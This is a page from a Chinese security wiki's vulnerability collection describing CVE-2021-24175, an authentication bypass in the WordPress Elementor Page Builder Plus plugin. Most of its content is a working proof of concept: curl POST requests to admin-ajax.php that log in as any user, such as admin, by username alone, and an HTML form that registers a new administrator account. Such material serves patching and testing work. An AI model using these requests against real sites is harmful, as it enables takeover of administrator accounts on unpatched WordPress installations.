menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right Vulnerability-棱角社区(Vulnerability)项目漏洞-20210715 chevron_right WordPress Elementor Page Builder Plus插件身份验证绕过(CVE-2021-24175).md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    WordPress Elementor Page Builder Plus插件身份验证绕过(CVE-2021-24175).md
    1.35 KB / 2021-05-21 09:14:38
        # WordPress Elementor Page Builder Plus插件身份验证绕过(CVE-2021-24175)
    
    未经身份验证的用户可以使用"theplus_ajax_login"和"theplus_google_ajax_register" Ajax请求,通过仅提供相关的用户名,就可以像任何用户一样轻松地进行身份验证。
    
    影响版本:
    
    Elementor Page Builder <4.1.7
    
    PoC:
    
    ```bash
    curl -X POST --data action=theplus_ajax_login --data email=admin -iLSS https://example.com/wp-admin/admin-ajax.php
    curl -X POST --data action=theplus_google_ajax_register --data email=admin --data nonce=a -iLSS https://example.com/wp-admin/admin-ajax.php
    ```
    
    "theplus_google_ajax_register"  AJAX请求还可以允许任何未经身份验证的用户创建具有任意角色的帐户,例如admin,然后登录。
    
    html:
    
    ```html
    <form method="POST" action="https://example.com/wp-admin/admin-ajax.php">
    <input value="newadmin" name="name" type="text">
    <input value="[email protected]" name="email" type="text">
    <input value="test" name="password" type="text">
    <input value="theplus_google_ajax_register" name="action" type="text">
    <input value="administrator" name="tp_user_reg_role" type="text">
    <input value="any" name="nonce" type="text">
    <input type="submit" />
    </form>
    
    ```
    
    ref:
    
    * https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24175
    * https://wpscan.com/vulnerability/c311feef-7041-4c21-9525-132b9bd32f89
    
    links
    file_download